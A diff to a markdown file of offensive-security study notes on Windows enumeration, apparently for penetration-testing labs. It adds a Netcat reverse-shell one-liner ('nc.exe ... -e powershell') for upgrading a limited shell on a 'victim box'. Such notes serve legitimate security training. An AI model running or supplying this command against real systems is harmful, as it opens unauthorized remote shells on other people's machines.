grandMa5ter/Cyber-Sec-Notes/offensive/enumeration-windows.md

 ### Netcat Reverseshell Oneliners for Windows

 Sometimes it is helpful to create a new Netcat session from an existed limited shell, webshell or unstable (short lived) remote shell.
+If you have transfered the shell to victim box, execute:
+  `nc.exe 10.10.14.23 9001 -e powershell`

 # Windows Enumeration